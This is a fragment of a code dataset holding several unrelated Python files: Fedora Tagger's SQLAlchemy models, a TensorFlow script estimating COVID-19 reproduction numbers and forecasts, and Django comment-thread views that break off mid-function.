= _DATE_to_python\n\n conn.set_converter_class(My_SQLConverter)\n return conn\n\ndef suppressWriteFrameWarning():\n warnings.filterwarnings(\"ignore\", message=\"write_frame is deprecated, use to_sql\")\n warnings.filterwarnings(\"ignore\", message=\"The 'mysql' flavor with DBAPI connection is deprecated.*\")\n\ndef callDBProc(row):\n conn = getMySQLConnection()\n cursor = conn.cursor()\n print(type(row['date']))\n args = [row['date']]\n results=cursor.callproc( \"new_procedure\", args)\n conn.commit()","sub_path":"databaseOperation.py","file_name":"databaseOperation.py","file_ext":"py","file_size_in_byte":6397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"466193588","text":"# This file is a part of Fedora Tagger\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\n# MA 02110-1301 USA\n#\n# Refer to the README.rst and LICENSE files for full details of the license\n# -*- coding: utf-8 -*-\n\"\"\"The application's model objects\"\"\"\nfrom __future__ import print_function\n\nimport json\nimport os\nfrom datetime import datetime\n\nimport pkgwat.api\nimport fedmsg\n\nfrom sqlalchemy import *\nfrom sqlalchemy import Table, ForeignKey, Column\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import relation, backref, synonym\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nfrom sqlalchemy.types import Integer, Unicode\n\nfrom kitchen.text.converters import to_unicode\n\nimport fedora.client\nfas = fedora.client.AccountSystem()\n\nDeclarativeBase = declarative_base()\n\n\ndef create_tables(db_url, alembic_ini=None, debug=False):\n \"\"\" Create the tables in the database using the information from the\n url obtained.\n\n :arg db_url, URL used to connect to the database. The URL contains\n information with regards to the database engine, the host to connect\n to, the user and password and the database name.\n ie: ://:@/\n :kwarg alembic_ini, path to the alembic ini file. This is necessary\n to be able to use alembic correctly, but not for the unit-tests.\n :arg debug, a boolean specifying wether we should have the verbose\n output of sqlalchemy or not.\n :return a session that can be used to query the database.\n \"\"\"\n engine = create_engine(db_url, echo=debug)\n DeclarativeBase.metadata.create_all(engine)\n\n if alembic_ini is not None: # pragma: no cover\n # then, load the Alembic configuration and generate the\n # version table, \"stamping\" it with the most recent rev:\n from alembic.config import Config\n from alembic import command\n alembic_cfg = Config(alembic_ini)\n command.stamp(alembic_cfg, \"head\")\n\n scopedsession = scoped_session(sessionmaker(bind=engine))\n return scopedsession\n\n\ndef tag_sorter(tag1, tag2):\n \"\"\" The tag list for each package should be sorted in descending order by\n the total score, ties are broken by the number of votes cast and if there\n is still a tie, alphabetically by the tag.\n \"\"\"\n for attr in ['total', 'votes', 'label']:\n result = cmp(getattr(tag1, attr), getattr(tag2, attr))\n if result != 0:\n return result\n return result\n\n\nclass YumTags(DeclarativeBase):\n \"\"\" Table packagetags to records simple association of package name\n with tags and the number of vote on the tag.\n \"\"\"\n __tablename__ = 'packagetags'\n\n name = Column(Text, nullable=False, primary_key=True)\n tag = Column(Text, nullable=False, primary_key=True)\n score = Column(Integer)\n\n @classmethod\n def all(cls, session):\n \"\"\" Return all the information. \"\"\"\n return session.query(cls).all()\n\n\nclass Package(DeclarativeBase):\n __tablename__ = 'package'\n __table_args__ = (\n UniqueConstraint('name'),\n )\n\n id = Column(Integer, primary_key=True)\n name = Column(Unicode(255), nullable=False)\n summary = Column(UnicodeText(convert_unicode=False), nullable=False)\n _meta = Column(Unicode, server_default='{}', nullable=False)\n\n tags = relation('Tag', backref=('package'))\n ratings = relation('Rating', backref=('package'))\n usages = relation('Usage', backref=('package'))\n\n def rating(self, session):\n return session.query(func.avg(Rating.rating))\\\n .filter_by(package_id=self.id).one()[0]\n\n def meta(self, session):\n meta = json.loads(self._meta or '{}')\n if not meta:\n try:\n meta = pkgwat.api.get(self.name)\n self._meta = json.dumps(meta)\n session.add(self)\n session.commit()\n except Exception as e:\n print(\"Failed to get meta: %r from fedora-packages\" % self.name)\n print(str(e))\n\n return meta\n\n def icon(self, sess):\n # TODO - cache this in the db so we don't have to hit pkgwat.\n tmpl = \"https://apps.fedoraproject.org/packages/images/icons/%s.png\"\n return tmpl % (self.meta(sess).get('icon', None) or 'package_128x128')\n\n def xapian_summary(self, sess):\n return self.meta(sess).get('summary', None) or ''\n\n @classmethod\n def by_name(cls, session, pkgname):\n \"\"\" Returns the Package corresponding to the provided package\n name.\n\n :arg session: the session used to query the database\n :arg pkgname: the name of the package (string)\n :raise sqlalchemy.orm.exc.NoResultFound: when the query selects\n no rows.\n :raise sqlalchemy.orm.exc.MultipleResultsFound: when multiple\n rows are matching.\n \"\"\"\n return session.query(cls).filter_by(name=pkgname).one()\n\n @classmethod\n def random(cls, session):\n \"\"\" Returns a random package from the database.\n\n :arg session: the session used to query the database\n :arg pkgname: the name of the package (string)\n \"\"\"\n result = session.query(cls).order_by(func.random()).first()\n if not result:\n raise NoResultFound()\n return result\n\n @classmethod\n def all(cls, session):\n \"\"\" Returns all Package entries in the database.\n\n :arg session: the session used to query the database\n \"\"\"\n return session.query(cls).all()\n\n @property\n def usage(self):\n return len(self.usages)\n\n def __unicode__(self):\n return self.name\n\n def __json__(self, session):\n \"\"\" JSON.. kinda. \"\"\"\n\n tags = []\n for tag in self.tags:\n tags.append(tag.__json__())\n\n rating = Rating.rating_of_package(session, self.id) or -1\n result = {\n 'name': self.name,\n 'summary': self.summary,\n 'tags': tags,\n 'rating': int(rating),\n 'usage': self.usage,\n 'icon': self.icon(session),\n }\n\n return result\n\n def __tag_json__(self):\n\n tags = []\n for tag in self.tags:\n tags.append(tag.__json__())\n\n result = {\n 'name': self.name,\n 'tags': tags,\n }\n\n return result\n\n def __rating_json__(self, session):\n\n rating = Rating.rating_of_package(session, self.id) or -1\n result = {\n 'name': self.name,\n 'rating': float(rating),\n }\n\n return result\n\n def __usage_json__(self, session):\n return {\n 'name': self.name,\n 'usage': self.usage,\n }\n\n def __jit_data__(self):\n return {\n 'hover_html':\n u\"

Package: {name}

    \" +\n \" \".join([\n \"
  • {tag.label.label} - {tag.like} / {tag.dislike}
  • \"\n .format(tag=tag) for tag in self.tags\n ]) + \"
\"\n }\n\n\nclass Tag(DeclarativeBase):\n __tablename__ = 'tag'\n __table_args__ = (\n UniqueConstraint('package_id', 'label'),\n )\n\n id = Column(Integer, primary_key=True)\n package_id = Column(Integer, ForeignKey('package.id'))\n label = Column(Unicode(255), nullable=False)\n votes = relation('Vote', backref=('tag'))\n\n like = Column(Integer, default=1)\n dislike = Column(Integer, default=0)\n\n @property\n def banned(self):\n \"\"\" We want to exclude some tags permanently.\n\n https://github.com/ralphbean/fedora-tagger/issues/16\n \"\"\"\n\n return any([\n self.label.startswith('x-'),\n self.label == 'application',\n self.label == 'system',\n self.label == 'utility',\n ])\n\n @property\n def total(self):\n return self.like - self.dislike\n\n @property\n def total_votes(self):\n return self.like + self.dislike\n\n @classmethod\n def get(cls, session, package_id, label):\n return session.query(cls).filter_by(package_id=package_id\n ).filter_by(label=label).one()\n\n @classmethod\n def by_label(cls, session, label):\n return session.query(cls).filter_by(label=label).all()\n\n @classmethod\n def count_unique_label(cls, session):\n return session.query(func.count(distinct(cls.label))).first()[0]\n\n def __unicode__(self):\n return self.label + \" on \" + self.package.name\n\n def __pkg_json__(self):\n result = {\n 'tag': self.label,\n 'like': self.like,\n 'dislike': self.dislike,\n 'total': self.total,\n 'votes': self.total_votes,\n 'package': self.package.name\n }\n\n return result\n\n __json__ = __pkg_json__\n\n def __jit_data__(self):\n return {\n 'hover_html':\n u\"\"\"

Tag: {label}

\n
    \n
  • Likes: {like}
  • \n
  • Dislike: {dislike}
  • \n
  • Total: {total}
  • \n
  • Votes: {votes}
  • \n
\n \"\"\".format(\n label=unicode(self),\n like=self.like,\n dislike=self.dislike,\n total=self.total,\n votes=self.votes,\n )\n }\n\n\nclass Vote(DeclarativeBase):\n __tablename__ = 'vote'\n __table_args__ = (\n UniqueConstraint('user_id', 'tag_id'),\n )\n\n id = Column(Integer, primary_key=True)\n like = Column(Boolean, nullable=False)\n user_id = Column(Integer, ForeignKey('user.id'))\n tag_id = Column(Integer, ForeignKey('tag.id'))\n\n @classmethod\n def get(cls, session, user_id, tag_id):\n return session.query(cls).filter_by(user_id=user_id\n ).filter_by(tag_id=tag_id).one()\n\n @classmethod\n def get_votes_user(cls, session, user_id):\n return session.query(cls).filter_by(user_id=user_id).all()\n\n def __json__(self):\n\n result = {\n 'like': self.like,\n 'user': self.user.__json__(),\n 'tag': self.tag.__json__(),\n }\n\n return result\n\n\nclass Usage(DeclarativeBase):\n __tablename__ = 'usage'\n __table_args__ = (\n UniqueConstraint('user_id', 'package_id'),\n )\n id = Column(Integer, primary_key=True)\n user_id = Column(Integer, ForeignKey('user.id'))\n package_id = Column(Integer, ForeignKey('package.id'))\n\n @classmethod\n def get(cls, session, package_id, user_id):\n \"\"\" Return a specific user's usage of a specific package. \"\"\"\n return session.query(cls)\\\n .filter_by(package_id=package_id)\\\n .filter_by(user_id=user_id).one()\n\n @classmethod\n def usage_of_package(cls, session, pkgid):\n \"\"\" Return the usage count of the package specified by a id\n\n :arg session: the session used to query the database\n :arg pkgid: the identifier of the package in the database\n (integer)\n \"\"\"\n return session.query(cls).filter_by(package_id=pkgid).count()\n\n @classmethod\n def all(cls, session):\n \"\"\" Return the total usage of all the packages in the database.\n\n Returns a list of tuples of the form::\n\n [\n (Package1, total_usage),\n (Package2, total_usage),\n ...\n ]\n\n :arg session: the session used to query the database\n \"\"\"\n subquery = session.query(\n cls.package_id.label('package_id'),\n func.count(cls.id).label('total_usage')\n ).group_by(cls.package_id).subquery()\n\n return session.query(Package, subquery.c.total_usage).filter(\n Package.id == subquery.c.package_id\n ).all()\n\n def __json__(self, session):\n return {\n 'user': self.user.__json__(),\n 'package': self.package.__json__(session),\n }\n\n\nclass Rating(DeclarativeBase):\n __tablename__ = 'rating'\n __table_args__ = (\n UniqueConstraint('user_id', 'package_id'),\n )\n\n id = Column(Integer, primary_key=True)\n user_id = Column(Integer, ForeignKey('user.id'))\n package_id = Column(Integer, ForeignKey('package.id'))\n rating = Column(Integer, nullable=False)\n\n @classmethod\n def get(cls, session, package_id, user_id):\n \"\"\" Return a specific user's rating on a specific package. \"\"\"\n return session.query(cls)\\\n .filter_by(package_id=package_id)\\\n .filter_by(user_id=user_id).one()\n\n @classmethod\n def rating_of_package(cls, session, pkgid):\n \"\"\" Return the average rating of the package specified by his\n package.id.\n\n :arg session: the session used to query the database\n :arg pkgid: the identifier of the package in the database\n (integer)\n \"\"\"\n return session.query(func.avg(cls.rating)\n ).filter_by(package_id=pkgid).one()[0]\n\n @classmethod\n def all(cls, session):\n \"\"\" Return the average rating of all the packages in the database.\n\n Returns a list of tuples of the form::\n\n [\n (Package1, average_rating),\n (Package2, average_rating),\n ...\n ]\n\n :arg session: the session used to query the database\n \"\"\"\n subquery = session.query(\n cls.package_id.label('package_id'),\n func.avg(cls.rating).label('avg_rating')\n ).group_by(cls.package_id).subquery()\n\n return session.query(Package, subquery.c.avg_rating).filter(\n Package.id == subquery.c.package_id\n ).all()\n\n @classmethod\n def by_rating(cls, session, ratingscore):\n \"\"\" Return all the packages in the database having the specified\n rating.\n\n :arg session: the session used to query the database\n \"\"\"\n subquery = session.query(\n cls.package_id.label('package_id'),\n func.avg(cls.rating).label('avg'),\n ).group_by(cls.package_id).subquery()\n\n return session.query(Package).filter(and_(\n Package.id == subquery.c.package_id,\n subquery.c.avg == ratingscore,\n )).all()\n\n def __json__(self, session):\n\n result = {\n # We type this to an int to avoid precision problems in json that\n # cascade into crypto problems between machines.\n # See https://github.com/fedora-infra/fedmsg/pull/201 for reference\n 'rating': int(self.rating),\n 'user': self.user.__json__(),\n 'package': self.package.__json__(session),\n }\n\n return result\n\n\nclass FASUser(DeclarativeBase):\n __tablename__ = 'user'\n __table_args__ = (\n UniqueConstraint('username'),\n )\n\n id = Column(Integer, primary_key=True)\n username = Column(Unicode(255), nullable=False)\n\n votes = relation('Vote', backref=('user'))\n ratings = relation('Rating', backref=('user'))\n usages = relation('Usage', backref=('user'))\n\n email = Column(Unicode(255), default=None)\n notifications_on = Column(Boolean, default=True)\n _rank = Column(Integer, default=-1)\n score = Column(Integer, nullable=False, default=0)\n api_token = Column(String(45), default=None)\n api_date = Column(Date, default=datetime.today())\n anonymous = Column(Boolean, nullable=False, default=False)\n\n @property\n def total_votes(self):\n return len(self.votes)\n\n def uses(self, session, package):\n for usage in self.usages:\n if usage.package == package:\n return True\n return False\n\n def rank(self, session):\n _rank = self._rank\n\n if self.anonymous:\n return -1\n\n users = session.query(FASUser)\\\n .filter(FASUser.username != 'anonymous').all()\n lookup = sorted(set([u.score for u in users]), reverse=True)\n rank = lookup.index(self.score) + 1\n\n # If their rank has changed.\n changed = (rank != _rank)\n\n # And it didn't change to last place. We check last_place only to try\n # and avoid spamming the fedmsg bus. We have a number of users who\n # have logged in once, and never voted. Everytime a *new* user logs\n # in and votes once, *all* the users in last place get bumped down\n # one notch.\n # No need to spew that to the message bus.\n is_last = (rank == len(lookup))\n\n if changed:\n self._rank = rank\n session.add(self)\n session.commit()\n\n if changed and not is_last:\n fedmsg.send_message(topic='user.rank.update', msg={\n 'user': self,\n })\n\n return self._rank\n\n @property\n def gravatar_lg(self):\n return self._gravatar(s=140)\n\n @property\n def gravatar_md(self):\n return self._gravatar(s=64)\n\n @property\n def gravatar_sm(self):\n return self._gravatar(s=32)\n\n def _gravatar(self, s):\n url = fas.avatar_url(self.username, size=s, lookup_email=False)\n return \"\" % url\n\n @classmethod\n def get_or_create(cls, session, username, email=None,\n anonymous=False):\n \"\"\" Get or Add a user to the database using its username.\n This function simply tries to find the specified username in the\n database and if that person is not known, add a new user with\n this username.\n\n :arg session: the session used to query the database.\n :arg username: the username of the user to search for or to\n create. In some cases it will be his IP address.\n :kwarg email: the email address to associate with this user.\n :kwarg anonymous: a boolean specifying if the user is anonymous\n or not.\n \"\"\"\n try:\n user = session.query(cls).filter_by(username=username).one()\n if email:\n user.email = email\n except NoResultFound:\n user = FASUser(username=username,\n email=email,\n anonymous=anonymous)\n session.add(user)\n session.flush()\n return user\n\n @classmethod\n def top(cls, session, limit=10):\n \"\"\" Return the top contributors ordered by their scores.\n\n :arg session: the session used to query the database.\n :kwarg limit: the max number of user to return.\n \"\"\"\n return session.query(cls\n ).filter(FASUser.anonymous == False\n ).order_by(FASUser.score.desc()\n ).limit(limit\n ).all()\n\n @classmethod\n def by_name(cls, session, username):\n \"\"\" Return the user based on the provided username.\n\n :arg session: the session used to query the database.\n :arg username: the username of the desired user.\n \"\"\"\n return session.query(cls\n ).filter(FASUser.username == username\n ).filter(FASUser.anonymous == False\n ).one()\n\n def __json__(self, visited=None):\n obj = {\n 'username': self.anonymous and 'anonymous' or self.username,\n 'votes': self.total_votes,\n 'score': self.score,\n 'rank': self._rank,\n 'anonymous': self.anonymous,\n }\n\n return obj\n","sub_path":"fedoratagger/lib/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":20156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"118590881","text":"\"\"\"Calculate Rt given a posterior\"\"\"\nimport argparse\nimport os\nimport yaml\nimport h5py\nimport numpy as np\nimport pandas as pd\nimport geopandas as gp\n\nimport tensorflow as tf\nfrom gemlib.util import compute_state\n\nfrom covid.cli_arg_parse import cli_args\nfrom covid.summary import (\n rayleigh_quotient,\n power_iteration,\n)\nfrom covid.summary import mean_and_ci\n\nimport model_spec\n\nDTYPE = model_spec.DTYPE\n\nGIS_TEMPLATE = \"data/UK2019mod_pop.gpkg\"\n\n\n# Reproduction number calculation\ndef calc_R_it(param, events, init_state, covar_data, priors):\n \"\"\"Calculates effective reproduction number for batches of metapopulations\n :param theta: a tensor of batched theta parameters [B] + theta.shape\n :param xi: a tensor of batched xi parameters [B] + xi.shape\n :param events: a [B, M, T, X] batched events tensor\n :param init_state: the initial state of the epidemic at earliest inference date\n :param covar_data: the covariate data\n :return a batched vector of R_it estimates\n \"\"\"\n\n def r_fn(args):\n beta1_, beta2_, beta3_, sigma_, xi_, gamma0_, events_ = args\n t = events_.shape[-2] - 1\n state = compute_state(init_state, events_, model_spec.STOICHIOMETRY)\n state = tf.gather(state, t, axis=-2) # State on final inference day\n\n model = model_spec.CovidUK(\n covariates=covar_data,\n initial_state=init_state,\n initial_step=0,\n num_steps=events_.shape[-2],\n priors=priors,\n )\n\n xi_pred = model_spec.conditional_gp(\n model.model[\"xi\"](beta1_, sigma_),\n xi_,\n tf.constant(\n [events.shape[-2] + model_spec.XI_FREQ], dtype=model_spec.DTYPE\n )[:, tf.newaxis],\n )\n\n par = dict(\n beta1=beta1_,\n beta2=beta2_,\n beta3=beta3_,\n sigma=sigma_,\n gamma0=gamma0_,\n xi=xi_,\n )\n print(\"xi shape:\", par[\"xi\"].shape)\n ngm_fn = model_spec.next_generation_matrix_fn(covar_data, par)\n ngm = ngm_fn(t, state)\n return ngm\n\n return tf.vectorized_map(\n r_fn,\n elems=(\n param[\"beta1\"],\n param[\"beta2\"],\n param[\"beta3\"],\n param[\"sigma\"],\n param[\"xi\"],\n param[\"gamma0\"],\n events,\n ),\n )\n\n\n@tf.function\ndef predicted_incidence(param, init_state, init_step, num_steps, priors):\n \"\"\"Runs the simulation forward in time from `init_state` at time `init_time`\n for `num_steps`.\n :param theta: a tensor of batched theta parameters [B] + theta.shape\n :param xi: a tensor of batched xi parameters [B] + xi.shape\n :param events: a [B, M, S] batched state tensor\n :param init_step: the initial time step\n :param num_steps: the number of steps to simulate\n :param priors: the priors for gamma\n :returns: a tensor of srt_quhape [B, M, num_steps, X] where X is the number of state\n transitions\n \"\"\"\n\n def sim_fn(args):\n beta1_, beta2_, beta3_, sigma_, xi_, gamma0_, gamma1_, init_ = args\n\n par = dict(\n beta1=beta1_,\n beta2=beta2_,\n beta3=beta3_,\n gamma0=gamma0_,\n gamma1=gamma1_,\n xi=xi_,\n )\n\n model = model_spec.CovidUK(\n covar_data,\n initial_state=init_,\n initial_step=init_step,\n num_steps=num_steps,\n priors=priors,\n )\n sim = model.sample(**par)\n return sim[\"seir\"]\n\n events = tf.map_fn(\n sim_fn,\n elems=(\n param[\"beta1\"],\n param[\"beta2\"],\n param[\"beta3\"],\n param[\"sigma\"],\n param[\"xi\"],\n param[\"gamma0\"],\n param[\"gamma1\"],\n init_state,\n ),\n fn_output_signature=(tf.float64),\n )\n return events\n\n\n# Today's prevalence\ndef prevalence(predicted_state, population_size, name=None):\n \"\"\"Computes prevalence of E and I individuals\n\n :param state: the state at a particular timepoint [batch, M, S]\n :param population_size: the size of the population\n :returns: a dict of mean and 95% credibility intervals for prevalence\n in units of infections per person\n \"\"\"\n prev = tf.reduce_sum(predicted_state[:, :, 1:3], axis=-1) / tf.squeeze(\n population_size\n )\n return mean_and_ci(prev, name=name)\n\n\ndef predicted_events(events, name=None):\n num_events = tf.reduce_sum(events, axis=-1)\n return mean_and_ci(num_events, name=name)\n\n\nif __name__ == \"__main__\":\n\n args = cli_args()\n\n # Get general config\n with open(args.config, \"r\") as f:\n config = yaml.load(f, Loader=yaml.FullLoader)\n\n inference_period = [\n np.datetime64(x) for x in config[\"Global\"][\"inference_period\"]\n ]\n\n # Load covariate data\n covar_data = model_spec.gather_data(config)\n\n # Load posterior file\n posterior_path = os.path.join(\n config[\"output\"][\"results_dir\"], config[\"output\"][\"posterior\"]\n )\n print(\"Using posterior:\", posterior_path)\n posterior = h5py.File(\n os.path.expandvars(posterior_path,),\n \"r\",\n rdcc_nbytes=1024 ** 3,\n rdcc_nslots=1e6,\n )\n\n # Pre-determined thinning of posterior (better done in MCMC?)\n idx = range(6000, 10000, 10)\n param = dict(\n beta1=posterior[\"samples/beta1\"][idx],\n beta2=posterior[\"samples/beta2\"][idx],\n beta3=posterior[\"samples/beta3\"][idx,],\n sigma=posterior[\"samples/sigma\"][idx,],\n xi=posterior[\"samples/xi\"][idx],\n gamma0=posterior[\"samples/gamma0\"][idx],\n gamma1=posterior[\"samples/gamma1\"][idx],\n )\n events = posterior[\"samples/events\"][idx]\n init_state = posterior[\"initial_state\"][:]\n state_timeseries = compute_state(\n init_state, events, model_spec.STOICHIOMETRY\n )\n\n # Build model\n model = model_spec.CovidUK(\n covar_data,\n initial_state=init_state,\n initial_step=0,\n num_steps=events.shape[1],\n priors=config[\"mcmc\"][\"prior\"],\n )\n\n ngms = calc_R_it(\n param, events, init_state, covar_data, config[\"mcmc\"][\"prior\"]\n )\n b, _ = power_iteration(ngms)\n rt = rayleigh_quotient(ngms, b)\n q = np.arange(0.05, 1.0, 0.05)\n rt_quantiles = pd.DataFrame(\n {\"Rt\": np.quantile(rt, q, axis=-1)}, index=q\n ).T.to_excel(\n os.path.join(\n config[\"output\"][\"results_dir\"], config[\"output\"][\"national_rt\"]\n ),\n )\n\n # Prediction requires simulation from the last available timepoint for 28 + 4 + 1 days\n # Note a 4 day recording lag in the case timeseries data requires that\n # now = state_timeseries.shape[-2] + 4\n prediction = predicted_incidence(\n param,\n init_state=state_timeseries[..., -1, :],\n init_step=state_timeseries.shape[-2] - 1,\n num_steps=70,\n priors=config[\"mcmc\"][\"prior\"],\n )\n predicted_state = compute_state(\n state_timeseries[..., -1, :], prediction, model_spec.STOICHIOMETRY\n )\n\n # Prevalence now\n prev_now = prevalence(\n predicted_state[..., 4, :], covar_data[\"N\"], name=\"prev\"\n )\n\n # Incidence of detections now\n cases_now = predicted_events(prediction[..., 4:5, 2], name=\"cases\")\n\n # Incidence from now to now+7\n cases_7 = predicted_events(prediction[..., 4:11, 2], name=\"cases7\")\n cases_14 = predicted_events(prediction[..., 4:18, 2], name=\"cases14\")\n cases_21 = predicted_events(prediction[..., 4:25, 2], name=\"cases21\")\n cases_28 = predicted_events(prediction[..., 4:32, 2], name=\"cases28\")\n cases_56 = predicted_events(prediction[..., 4:60, 2], name=\"cases56\")\n\n # Prevalence at day 7\n prev_7 = prevalence(\n predicted_state[..., 11, :], covar_data[\"N\"], name=\"prev7\"\n )\n prev_14 = prevalence(\n predicted_state[..., 18, :], covar_data[\"N\"], name=\"prev14\"\n )\n prev_21 = prevalence(\n predicted_state[..., 25, :], covar_data[\"N\"], name=\"prev21\"\n )\n prev_28 = prevalence(\n predicted_state[..., 32, :], covar_data[\"N\"], name=\"prev28\"\n )\n prev_56 = prevalence(\n predicted_state[..., 60, :], covar_data[\"N\"], name=\"prev56\"\n )\n\n def geosummary(geodata, summaries):\n for summary in summaries:\n for k, v in summary.items():\n arr = v\n if isinstance(v, tf.Tensor):\n arr = v.numpy()\n geodata[k] = arr\n\n ## GIS here\n ltla = gp.read_file(GIS_TEMPLATE, layer=\"UK2019mod_pop_xgen\")\n ltla = ltla[ltla[\"lad19cd\"].str.startswith(\"E\")] # England only, for now.\n ltla = ltla.sort_values(\"lad19cd\")\n rti = tf.reduce_sum(ngms, axis=-2)\n\n geosummary(\n ltla,\n (\n mean_and_ci(rti, name=\"Rt\"),\n prev_now,\n cases_now,\n prev_7,\n prev_14,\n prev_21,\n prev_28,\n prev_56,\n cases_7,\n cases_14,\n cases_21,\n cases_28,\n cases_56,\n ),\n )\n\n ltla[\"Rt_exceed\"] = np.mean(rti > 1.0, axis=0)\n ltla = ltla.loc[\n :,\n ltla.columns.str.contains(\n \"(lad19cd|lad19nm$|prev|cases|Rt|popsize|geometry)\", regex=True\n ),\n ]\n ltla.to_file(\n os.path.join(\n config[\"output\"][\"results_dir\"], config[\"output\"][\"geopackage\"]\n ),\n driver=\"GPKG\",\n )\n","sub_path":"covid/tasks/summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":9457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"584637865","text":"import json\n# from django.shortcuts import render\nfrom django.contrib import messages\nfrom .models import Comment\nfrom .forms import CommentForm\nfrom django.views.generic import DetailView, DeleteView, FormView, View, RedirectView\nfrom django.core import serializers\nfrom ..core.models import ModelFormFailureHistory\nfrom django.urls import reverse_lazy, reverse\n# from django.shortcuts import get_object_or_404\nfrom django.views.generic.detail import SingleObjectMixin\nfrom django.http import HttpResponseForbidden, HttpResponseRedirect, Http404, HttpResponse\nfrom django.contrib.contenttypes.models import ContentType\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import authentication, permissions\n# Create your views here.\nfrom ..geba_analytics.mixins import ObjectViewMixin\n\n\nclass CommentActionMixin(object):\n # the fields that geba_auth will be able to type in the forms for CreateView\n # fields = ('published', 'title', 'body')\n\n @property\n def success_msg(self):\n return NotImplemented\n\n def form_valid(self, form):\n messages.info(self.request, self.success_msg)\n return super(CommentActionMixin, self).form_valid(form)\n\n def form_invalid(self, form):\n \"\"\"saves invalid form and model data for later reference.\"\"\"\n form_data = json.dumps(form.cleaned_data)\n model_data = serializers.serialize(\"json\",\n [form.instance])[1:-1]\n ModelFormFailureHistory.objects.create(form_data=form_data, model_data=model_data)\n return super(CommentActionMixin, self).form_invalid(form)\n\n\nclass CommentThreadGetView(ObjectViewMixin, DetailView):\n \"\"\"This view will be used to GET the detail data\"\"\"\n # success_msg = 'Comment Added!'\n model = Comment # generic views need to know which model to act upon\n template_name = 'comments/detail.html' # tells the view to use this template instead of it's default\n form_class = CommentForm\n\n def get(self, request, *args, **kwargs):\n # self.object = get_object_or_404(Comment, pk=kwargs['pk'])\n try:\n self.object = Comment.objects.get(pk=kwargs['pk'])\n except:\n response = HttpResponse(\"You do not have permission to do this.\")\n response.status_code = 403\n return response\n\n if not self.object.is_parent:\n # if the object isn't a parent, get the parent object\n self.object = self.object.parent\n\n # the original get defines self.object, this is required otherwise you get an error stating that there is no\n # attribute 'object' in this DetailView\n context = self.get_context_data(object=self.object)\n context['comment'] = self.object\n\n instance = self.object\n\n context = self.get_context_data(object=self.object)\n\n initial_data = {\n 'content_type': instance.content_type,\n 'object_id': instance.id,\n }\n comment_form = self.form_class(request.POST or None, initial=initial_data)\n\n context['comment_form'] = comment_form\n return self.render_to_response(context)\n\n def get_context_data(self, **kwargs):\n context = super(CommentThreadGetView, self).get_context_data(**kwargs)\n\n # context['object'] provides the instance for us\n context['comments'] = context['object']\n # context['comment_form'] = CommentForm()\n return context\n\n\nclass CommentThreadPostView(SingleObjectMixin, FormView):\n \"\"\"This view will be used to POST the detail data\n\n SingleObjectMixin = Provides a mechanism for looking up an object associated with the current HTTP request.\n i.e. using get_object()\n \"\"\"\n template_name = 'comments/detail.html' # tells the view to use this template instead of it's default\n form_class = CommentForm\n model = Comment # generic views need to know which model to act upon\n\n def post(self, request, *args, **kwargs):\n # comment_form = self.form_class(request.POST, request.FILES)\n if not request.user.is_authenticated:\n return HttpResponseForbidden()\n\n # self.object = self.get_object()\n try:\n self.object = Comment.objects.get(pk=kwargs['pk'])\n except:\n response = HttpResponse(\"You do not have permission to do this.\")\n response.status_code = 403\n return response\n\n if not self.object.is_parent:\n # if the object isn't a parent, get the parent object\n self.object = self.object.parent\n\n form = self.form_class(request.POST)\n if form.is_valid():\n c_type = form.cleaned_data.get(\"content_type\")\n content_type = ContentType.objects.get(model=c_type)\n object_id = form.cleaned_data.get(\"object_id\")\n content_data = form.cleaned_data.get(\"content\")\n parent_object = None\n try:\n parent_id = int(request.POST.get(\"parent_id\"))\n except:\n parent_id = None\n\n if parent_id:\n parent_qs = Comment.objects.filter(id=parent_id)\n if parent_qs.exists():\n parent_object = parent_qs.first() # get the first object in that queryset\n\n new_comment, created = Comment.objects.get_or_create(\n author=request.user,\n content_type=content_type,\n object_id=object_id,\n content=content_data,\n parent=parent_object\n )\n\n return super().post(request, *args, **kwargs)\n\n def get_success_url(self):\n # return HttpResponseRedirect(self.new_comment.content_object.get_absolute_url())\n return reverse('comments:thread', kwargs={'pk': self.object.pk})\n\n\nclass CommentThreadView(View):\n \"\"\"This view will be used to ensure that one is for GET and the other for POST\"\"\"\n\n def get(self, request, *args, **kwargs):\n view = CommentThreadGetView.as_view()\n return view(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n view = CommentThreadPostView.as_view()\n return view(request, *args, **kwargs)\n\n\nclass CommentDeleteView(CommentActionMixin, DeleteView):\n\n model = Comment\n success_msg = 'Comment Deleted!'\n success_url = reverse_lazy('blog:index')\n\n # make it so you have to be a super-geba_auth or staff to delete\n def dispatch(self, request, *args, **kwargs):\n # request = check_comment_rights(request)\n object = Comment.objects.get(pk=kwargs['pk'])\n\n if object.author != request.user:\n # messages.success(request, \"You do not have permission to view this!\")\n response = HttpResponse(\"You do not have permission to do this.\")\n response.status_code = 403\n return response\n\n return super(CommentDeleteView, self).dispatch(request, *args, **kwargs)\n\n def post(self, *args, **kwargs):\n try:\n object = Comment.objects.get(pk=kwargs['pk'])\n\n except:\n raise Http404\n\n parent_obj_url = object.content_object.get_absolute_url()\n object.delete()\n messages.success(self.request, \"Comment has been deleted.\")\n return HttpResponseRedirect(parent_obj_url)\n\n\nUP = 0\nDOWN = 1\n\n\nclass CommentLikeToggle(RedirectView):\n\n def get_redirect_url(self, *args, **kwargs):\n pk = self.kwargs.get(\"pk\")\n obj = Comment.objects.get(pk=pk)\n # obj = get_object_or_404(Comment, pk=pk)\n url_ = obj.get_absolute_url() # get the url of the project post\n user = self.request.user # get the 